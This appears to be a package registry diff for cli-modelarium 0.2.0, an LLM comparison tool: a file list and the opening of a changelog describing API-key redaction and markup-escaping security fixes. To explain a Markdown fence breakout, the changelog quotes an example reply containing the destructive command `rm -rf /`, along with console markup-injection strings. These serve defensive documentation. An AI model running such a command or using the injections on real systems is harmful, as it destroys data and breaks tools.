cli-modelarium 0.1.8__tar.gz → 0.2.0__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- cli_modelarium-0.2.0/CHANGELOG.md +950 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/PKG-INFO +123 -42
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.de.md +108 -35
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.es.md +108 -35
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.fr.md +106 -33
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.it.md +108 -35
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.ja.md +106 -33
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.ko.md +106 -33
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.md +121 -40
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.pt.md +108 -35
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/README.zh.md +106 -33
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/SECURITY.md +5 -3
- cli_modelarium-0.2.0/docs/assets/cli-modelarium-diff-demo-4model.gif +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/reproducibility_analysis.sh +7 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/pyproject.toml +5 -3
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/__init__.py +1 -1
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/__main__.py +2 -2
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/assertions.py +100 -2
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/batch.py +41 -11
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/cli.py +866 -118
- cli_modelarium-0.2.0/src/cli_modelarium/diffing.py +659 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/exceptions.py +25 -3
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/judging.py +36 -5
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/models_registry.py +0 -2
- cli_modelarium-0.2.0/src/cli_modelarium/output_formatters.py +1965 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/pricing.py +315 -73
- cli_modelarium-0.2.0/src/cli_modelarium/providers/_utils.py +42 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/anthropic_provider.py +36 -4
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/base.py +11 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/google_provider.py +7 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/local_provider.py +4 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/mistral_provider.py +4 -1
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/openai_provider.py +4 -2
- cli_modelarium-0.2.0/src/cli_modelarium/run_identity.py +192 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/run_statistics.py +275 -84
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/security.py +36 -6
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/streaming.py +231 -18
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/conftest.py +38 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_anthropic_provider.py +20 -1
- cli_modelarium-0.2.0/tests/test_batch_model_resolution.py +124 -0
- cli_modelarium-0.2.0/tests/test_cancelled_cell_state.py +326 -0
- cli_modelarium-0.2.0/tests/test_ci_naming_alignment.py +112 -0
- cli_modelarium-0.2.0/tests/test_ci_per_cell.py +436 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_compare_max_cost.py +8 -1
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_significance.py +4 -1
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_v013.py +5 -5
- cli_modelarium-0.2.0/tests/test_concurrency_guard.py +135 -0
- cli_modelarium-0.2.0/tests/test_console_markup_escaping.py +302 -0
- cli_modelarium-0.2.0/tests/test_correction_budget.py +498 -0
- cli_modelarium-0.2.0/tests/test_cost_ceiling_exit.py +256 -0
- cli_modelarium-0.2.0/tests/test_cost_ceiling_runtime.py +138 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_csv_formula_injection.py +31 -5
- cli_modelarium-0.2.0/tests/test_csv_layout_v0110.py +263 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_deepseek_provider.py +3 -3
- cli_modelarium-0.2.0/tests/test_diff_command.py +688 -0
- cli_modelarium-0.2.0/tests/test_finite_float_guard.py +226 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_google_provider.py +27 -0
- cli_modelarium-0.2.0/tests/test_hallucination_denominator.py +316 -0
- cli_modelarium-0.2.0/tests/test_invalid_key_format_error.py +121 -0
- cli_modelarium-0.2.0/tests/test_judge_skips_refused_rows.py +219 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_judging.py +1 -1
- cli_modelarium-0.2.0/tests/test_live_display_escaping.py +180 -0
- cli_modelarium-0.2.0/tests/test_markdown_discriminator.py +180 -0
- cli_modelarium-0.2.0/tests/test_markdown_escaping.py +96 -0
- cli_modelarium-0.2.0/tests/test_markdown_untrusted_text.py +305 -0
- cli_modelarium-0.2.0/tests/test_mcnemar_pairing.py +317 -0
- cli_modelarium-0.2.0/tests/test_methodology_always.py +122 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_mistral_provider.py +13 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_nvidia_provider.py +1 -1
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_openai_provider.py +34 -0
- cli_modelarium-0.2.0/tests/test_payload_discriminators.py +363 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_pricing.py +61 -2
- cli_modelarium-0.2.0/tests/test_pricing_sweep_20260906.py +271 -0
- cli_modelarium-0.2.0/tests/test_pricing_verification.py +134 -0
- cli_modelarium-0.2.0/tests/test_print_error_escaping.py +187 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_readme_parity.py +139 -12
- cli_modelarium-0.2.0/tests/test_refusal_gate.py +592 -0
- cli_modelarium-0.2.0/tests/test_refusal_visibility.py +318 -0
- cli_modelarium-0.2.0/tests/test_refusals.py +465 -0
- cli_modelarium-0.2.0/tests/test_remaining_console_escaping.py +260 -0
- cli_modelarium-0.2.0/tests/test_run_identity.py +397 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_runs_display.py +20 -8
- cli_modelarium-0.2.0/tests/test_sdk_signature_conformance.py +302 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_security.py +128 -0
- cli_modelarium-0.2.0/tests/test_significance_console_escaping.py +240 -0
- cli_modelarium-0.2.0/tests/test_significance_refusal_caveat.py +251 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_statistical_significance.py +4 -1
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_stdout_machine_output.py +16 -7
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_streaming.py +105 -2
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_streaming_runs.py +3 -3
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_temperature_predicate.py +98 -16
- cli_modelarium-0.2.0/tests/test_uncaught_traceback_redaction.py +111 -0
- cli_modelarium-0.1.8/CHANGELOG.md +0 -478
- cli_modelarium-0.1.8/src/cli_modelarium/output_formatters.py +0 -1215
- cli_modelarium-0.1.8/src/cli_modelarium/providers/_utils.py +0 -26
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/.gitattributes +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/.github/dependabot.yml +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/.github/workflows/ci.yml +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/.github/workflows/security-audit.yml +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/.gitignore +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/CONTRIBUTING.md +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/LICENSE +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/NOTICE +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/docs/assets/cli-modelarium-comparison-demo.gif +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/docs/assets/cli-modelarium-demo.png +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/docs/assets/cli-modelarium-judge-demo.gif +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/docs/assets/cli-modelarium-runs-demo.gif +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/docs/assets/cli-modelarium-wordmark-dark.svg +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/docs/assets/cli-modelarium-wordmark-light.png +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/docs/assets/cli-modelarium-wordmark-light.svg +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/README.md +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/basic_comparison.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/batch_evaluation.json +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/ci_eval_suite.json +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/compare_all_providers.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/cost_gated_comparison.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/dashscope_qwen.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/expected_facts_example.txt +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/github_actions_workflow.yml +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/hallucination_test.json +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/judge_panel.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/local_models_discovery.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/mcnemar_hallucination.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/model_groups.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/publication_grade_eval.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/examples/statistical_significance.sh +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/banner.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/hallucination.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/io_safety.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/__init__.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/dashscope_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/deepseek_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/groq_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/moonshot_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/nvidia_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/openrouter_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/xai_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/src/cli_modelarium/providers/zai_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/__init__.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_assertions.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_banner.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_batch.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_bootstrap_ci.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_assertions.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_batch.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_compare_output.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_compare_output_with_hallucination.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_compare_output_with_judging.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_configure.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_hallucination.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_judging.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_keys.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_runs.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_cli_system_prompts.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_compare_multi_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_dashscope_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_display_gaps.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_documentation_files.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_examples_run.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_hallucination.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_jsonschema_optional.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_judging_cells.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_list_models_local.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_local_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_mcnemar.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_models_registry.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_models_resolution.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_moonshot_provider.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_output_formatters.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_paired_tests.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_provider_inheritance.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_rendered_output_convention.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_run_statistics.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_runs_cost_estimation.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_significance_display.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_system_prompts.py +0 -0
- {cli_modelarium-0.1.8 → cli_modelarium-0.2.0}/tests/test_zai_provider.py +0 -0
|
@@ -0,0 +1,950 @@
|
|
|
1
|
+
# Changelog
|
|
2
|
+
|
|
3
|
+
All notable changes to Cli Modelarium will be documented in this file.
|
|
4
|
+
|
|
5
|
+
## [0.2.0] - 2026-09-06
|
|
6
|
+
|
|
7
|
+
**Reading the entries below.** Each one records what its own change did and did
|
|
8
|
+
not move, measured against the tree that change landed on - so a note like
|
|
9
|
+
"byte-identical in JSON, CSV and Markdown" is a statement about that change and
|
|
10
|
+
not about the release. For what moved across 0.2.0 as a whole, read the four
|
|
11
|
+
items directly below.
|
|
12
|
+
|
|
13
|
+
### Act on these four
|
|
14
|
+
|
|
15
|
+
1. **A Google API key in the current `AQ.Ab` format was not redacted**, and
|
|
16
|
+
could reach console output, logs and saved files. If you have run this tool
|
|
17
|
+
with a `AQ.Ab`-format Google key, treat that key as exposed and rotate it.
|
|
18
|
+
Keys in the older `AIza` format were always redacted and are unaffected.
|
|
19
|
+
This is the only item in the release whose failure mode is irreversible.
|
|
20
|
+
|
|
21
|
+
2. **A CI pipeline that passes today may fail after upgrading.** A model that
|
|
22
|
+
declines a request no longer launders that failure through the assertion
|
|
23
|
+
ratio: the run exits `1` where it used to exit `0`. That is the point of the
|
|
24
|
+
change. The exit-code table in all nine READMEs and the `jq` recipe for
|
|
25
|
+
finding failures were both wrong and are corrected this release - read them
|
|
26
|
+
before upgrading a gate.
|
|
27
|
+
|
|
28
|
+
3. **The CSV layout moved.** Four columns are appended after `stop_category`;
|
|
29
|
+
the first 23 positions are byte-identical to v0.1.9. `run_index` and every
|
|
30
|
+
confidence-interval column shift right. **A pipeline reading CSV by column
|
|
31
|
+
position will need updating; one reading by header name is unaffected.**
|
|
32
|
+
|
|
33
|
+
4. **Three pricing rates were wrong, in both directions at once.** A cost tool
|
|
34
|
+
over-reported one model and under-reported two others, so a comparison run
|
|
35
|
+
before this release ranked them against each other incorrectly.
|
|
36
|
+
`gpt-5.6-sol` was **too expensive** by a third on output - 5.00 / 30.00
|
|
37
|
+
stored against an official 4.00 / 20.00 - which put it above
|
|
38
|
+
`claude-opus-4-8` when it belongs below. `deepseek-v4-pro` and
|
|
39
|
+
`deepseek-v4-flash` were **too cheap**: against DeepSeek's peak tier, which
|
|
40
|
+
is what the registry now stores, roughly **3x low on input and 4.5x low on
|
|
41
|
+
output**; against its off-peak tier, which is exactly half, roughly 1.5x and
|
|
42
|
+
2.3x. Every Mistral cache hit was over-reported **tenfold**, because four
|
|
43
|
+
published cached rates were missing and cached tokens fell through to the
|
|
44
|
+
full input rate. **If you have a stored budget or a `--max-cost` ceiling
|
|
45
|
+
tuned against the old numbers, re-derive it.**
|
|
46
|
+
|
|
47
|
+
### Security
|
|
48
|
+
|
|
49
|
+
Untrusted text reached a renderer or a log in seven places. Rich parses markup
|
|
50
|
+
in every string it prints, so a stray closing tag does not style anything - it
|
|
51
|
+
raises and takes the command down, after the call has been billed. The
|
|
52
|
+
individual sites and their measurements follow; the common fix is to escape at
|
|
53
|
+
each interpolation, and to redact before escaping so nothing a redaction
|
|
54
|
+
synthesises is re-parsed.
|
|
55
|
+
|
|
56
|
+
- **A Google API key in the current `AQ.Ab` format was not redacted.** The accept pattern was widened for that format in 0.1.7 and the redaction rules were not, so the tool took a key it could not scrub - and the key could appear unredacted in console output, in a saved report's `error` field, and in a traceback. Three shapes are now covered: the bare token, an `x-goog-api-key:` header, and the `?key=` query parameter that Gemini's REST URL carries. **`AIza` Standard keys were always redacted and are unaffected.** No key format is newly rejected; `KEY_PATTERNS` is unchanged. Mistral and Z.AI keys remain uncovered for the reason `SECURITY.md` already gives.
|
|
57
|
+
|
|
58
|
+
- **An unhandled crash now prints a redacted traceback instead of a raw one.** Every frame is preserved - only the text is scrubbed - and exit codes are unchanged.
|
|
59
|
+
|
|
60
|
+
- **Provider-supplied text is escaped before the console renders it.** Rich parses markup in every string it prints, and model output, judge reasoning, judge parse errors, the mode-output preview and a refusal's category all reached it unescaped - so a provider could style the terminal, emit a live hyperlink, or have text dropped. `a[b]c` in a refusal category rendered as `ac`; it now renders as written. Ordinary values are unchanged.
|
|
61
|
+
|
|
62
|
+
**Prompts, system prompts and model ids are escaped today**, by the entries below in this same section. A path is the one value still rendered as markup, at the `Wrote {output_path}` line in `cli.py` - worth knowing before adding a console site and following the surrounding code.
|
|
63
|
+
|
|
64
|
+
- **Model ids, judge ids, a local server's model list and the local URL all reached the console unescaped, and half of one line was already protected.** The judge lines are the sharpest: they **already** escaped the reasoning and the parse-error text and interpolated the judge id raw beside it, so the protected half was worth nothing - a stray closing tag in the id took the command down anyway. The rest are model ids in the summary-table cells and the per-run headers, `pricing`'s two lines, and the `id` and `owned_by` a local server returns from `/v1/models`, which are chosen by whatever is listening on the port rather than by the user.
|
|
65
|
+
|
|
66
|
+
**The local-server URL is six more sites, and one of them is a Table title that must keep its own markup.** `title=f"local [dim]({url})[/dim]"` - the `[dim]` is the tool's styling and has to be applied, not printed, so only `url` is escaped. Blanket-escaping the line would show the tag. Same shape as the assertion-message split in the Markdown formatter. Measured on the unreachable-server panel: `http://localhost:59999/v1[bold red]OWNED[/bold red]` rendered as `http://localhost:59999/v1OWNED`, a URL the user never typed, with the tags applied as styling. The URL is operator-supplied configuration rather than remote input, so this is lower severity than model output - but a link-local IPv6 address is `http://[fe80::1%25eth0]:11434`, and rendering that raw gives `http://:11434`, so it takes no hostility to hit.
|
|
67
|
+
|
|
68
|
+
**Emoji substitution is the one console corruption escaping cannot fix, and it is now switched off rather than left to chance.** Rich replaces `:word:` shortcodes *after* markup parsing and `escape` never touches a colon, so `x:free:y` became an emoji however well it was escaped. `emoji=False` is set on the Console rather than passed per print, because the per-print kwarg does not reach a string nested inside a `Panel` or `Table` and the Console setting does - both measured. It costs nothing: the tool writes no shortcodes of its own, and its marks are literal characters rather than `:check:`-style names. **The shipped `:free` OpenRouter ids are not affected either way** - a shortcode needs colons on both sides and `qwen/qwen3-coder:free` has one; all five render unchanged.
|
|
69
|
+
|
|
70
|
+
**What is deliberately not escaped.** `_risk_cell_for_compare` returns `[red]N/A[/red]` over `Low`/`Medium`/`High` or a number, and the significance header renders `click.Choice` values - the tool's own closed vocabulary. Escaping those kills the colours and mangles the words, the same way blanket-escaping mangled seven of the ten assertion type names in the Markdown report.
|
|
71
|
+
|
|
72
|
+
**No output file moves.** `rich.markup` is imported in `cli.py` and `streaming.py` only; `output_formatters.py`, which builds JSON, CSV and Markdown, uses its own escapers and never imports it. Confirmed structurally and by a seeded 2x2x5 judged run with `--bootstrap-seed` pinned - twenty rows, four cells, a significance test and a McNemar test - byte-identical in all three formats.
|
|
73
|
+
|
|
74
|
+
- **A model id could silently lose characters from the significance display, or take the whole command down after the models had been paid for.** The McNemar display was escaped in a previous change and its sibling was not, so `_display_significance` rendered user-supplied model ids raw at **six** places: the decline caveat, both lines of the two-model branch, the column headers *and* the row labels of the 3-5 model matrix, and the 6+ model top-K list. Rich parses markup in every one of them. Measured: `openrouter/a[secret]b` printed as `openrouter/ab`, naming a model that was never run; `local/model[/]` raised `MarkupError` and **four of the five display branches printed nothing at all**, the exception discarding the entire significance block at the end of a completed, billed run.
|
|
75
|
+
|
|
76
|
+
**The matrix branch was the half that did not look like a risk.** `Table.add_column` and `Table.add_row` render their arguments as markup exactly as `console.print` does, so a header or a row label built from a model id crashes as readily as an f-string; a test asserts that against Rich directly, so the premise is pinned rather than assumed. The caveat got the same treatment as its McNemar twin - a `_significance_caveat_markup` helper beside `_mcnemar_caveat_markup`, for the same reason and with the reason recorded.
|
|
77
|
+
|
|
78
|
+
The header line is deliberately left unescaped: `metric` and `correction_method` are `click.Choice` values, `test_used` is one of the fixed labels `run_statistics` assigns, and the threshold is a float - the tool's own closed vocabulary, not anyone's input.
|
|
79
|
+
|
|
80
|
+
- **A model's output could take over the Markdown report, and a model id could add a column to its tables.** An earlier change in this release added `_md_escape` and wired it to three call sites - the prompt, the default system prompt and the system-prompt legend. Eight more sites rendered untrusted text raw, and a ninth could not be fixed by escaping at all. The text is not hypothetical: a model id is typed on the command line, a model's **output** reaches three of these sites, a provider's error message reaches one, and an assertion's configured value reaches another.
|
|
81
|
+
|
|
82
|
+
**The worst case needs no hostile intent - a model answering a question about shell scripting is enough.** Asked for a snippet, a model replies with a fenced block; the report wraps that reply in a fence of its own, the reply's fence closes it early, and everything after is parsed as the report's own markup. Rendered before this change, a reply of ``Sure:\n```\nrm -rf /\n```\n**Now read this as report markup.**`` put `rm -rf /` into the report's prose, rendered the following line in bold as if the report had written it, and left a stray unclosed fence running to the end of the file. In the same report a model id of `local/my|model` split its table row into nine cells under an eight-column header, shifting every value one column left of its heading.
|
|
83
|
+
|
|
84
|
+
**Escaping cannot fix a fenced block, so the fence grows instead.** There is no escape syntax inside a fence: the only defence is an opening fence longer than any backtick run in the content, since a block closes on a run of *equal or greater* length. `_md_fence_for` computes it, so the example above now opens with four backticks and the model's own three-backtick fences stay inside as text.
|
|
85
|
+
|
|
86
|
+
**Identifiers get a code span, not backslashes.** `_md_escape` is right for prose and wrong for a name: it renders `max_length_chars` as `max\_length\_chars`, and **seven of the ten built-in assertion type names contain an underscore**, as do model ids. So `_md_code` wraps identifiers in a code span - where an underscore is already literal - with a delimiter one backtick longer than the longest run inside, which is what makes it unbreakable. It escapes `|` as well, because GFM splits a table row on pipes *before* it parses inline spans, so a code span alone does not protect one; outside a table that backslash would be visible, hence the `in_table` switch used by the two sites that are not table cells - the per-run heading and the assertion bullet.
|
|
87
|
+
|
|
88
|
+
**The assertion bullet is escaped in two halves rather than as one string.** `_md_assertion_message` is a Markdown twin of `format_assertion_message`: the type goes through `_md_code`, the message and the error text through `_md_escape`. Escaping that function's output wholesale was the obvious move and it mangles every identifier in the line - and breaks an existing test that asserts `max_length_chars` appears in the report.
|
|
89
|
+
|
|
90
|
+
The sites: the model id in the per-row table, the `**model @ temp:**` heading, the model id in the per-cell statistical table and in the bootstrap confidence-interval table, the **Mode** cell's output preview, the fenced per-run output block, the `> error:` blockquote, the assertion-failure bullets, the judge Score and Hallucination Risk cells (panel breakdowns, skipped-self-eval and degraded model lists), and the model ids in the significance and McNemar tables. The remaining backtick-wrapped values in the report - metric and test names, correction method, tool, scipy and Python versions, bootstrap parameters - are the tool's own vocabulary rather than anyone's input, and they render as bullets rather than table cells. Three existing assertions in `tests/test_temperature_predicate.py` were updated: a degraded judge's id now renders as a code span, and the id itself is unchanged.
|
|
91
|
+
|
|
92
|
+
- **An ordinary answer to an ordinary question could crash the live display mid-run, after the call had been billed.** Asked *"What does `[/]` mean in BBCode?"*, a model answers *"you close a tag with `[/]`"* - and `StreamingDisplay._panel` interpolated that answer into a Rich `Panel`, which parses markup. `rich.errors.MarkupError`, in both the streaming and the completed branch. Nothing unusual is required: no hostile provider, no crafted input, just a question about markup. The panel's model id and the provider's error message were raw for the same reason, and a `[link=...]` in any of them became a live terminal hyperlink.
|
|
93
|
+
|
|
94
|
+
**`--no-stream` was not exempt.** The system-prompt legend is printed *outside* the `if live_display:` block - deliberately, so it survives the `transient=True` cleanup - so a system prompt containing a bracket crashed on both paths. It renders literally on both now.
|
|
95
|
+
|
|
96
|
+
**Each value is escaped at its own interpolation, never as a composed string.** `stop_category` has been escaped since earlier in this release - not since 0.1.9, where it was still rendered raw - and the panel title is built *from* the string that carries it, so escaping the composed title would have escaped it twice - `escape(escape("a[b]c"))` is `a\\\[b]c`, two visible backslashes. The legend is escaped *after* its truncation, so the slice still measures the prompt rather than the backslashes. Two latent sites are escaped too: `retry_message` (only ever built from two literal reasons today) and the status fall-through (`Status` is a bare `str` with no closed set) - both interpolate an unconstrained string into markup, which is enough.
|
|
97
|
+
|
|
98
|
+
**This reverses a scope decision recorded earlier in this same release**, which said prompts, system prompts, model ids and paths were user-supplied and deliberately left as markup. It was not a 0.1.9 decision: the sentence was written after 0.1.9 shipped, and the 0.1.9 section contains no such statement. The reasoning was that a user putting markup in their own model id is styling their own terminal; it does not survive the failure, because a stray closing tag styles nothing - it raises and takes the command down. A `local/` id is not the user's text at all: it is whatever the local server reports.
|
|
99
|
+
|
|
100
|
+
**The crash was bounded at twelve concurrent tasks and no test could see it.** Above `AUTO_COLLAPSE_TASK_THRESHOLD` the live display is switched off and the panels are never built - measured, `runs=12` crashes and `runs=13` renders - so every test here runs at or below twelve. The panels were invisible to the suite for a different reason: `Live` needs a TTY, which `CliRunner` is not. Only the *wrapper* needs one, though; the renderable raises on a plain width-pinned `Console`, which is what this release's first escaping harness has always done - it was pointed at one field and now covers all of them as one parametrized matrix.
|
|
101
|
+
|
|
102
|
+
### Added
|
|
103
|
+
|
|
104
|
+
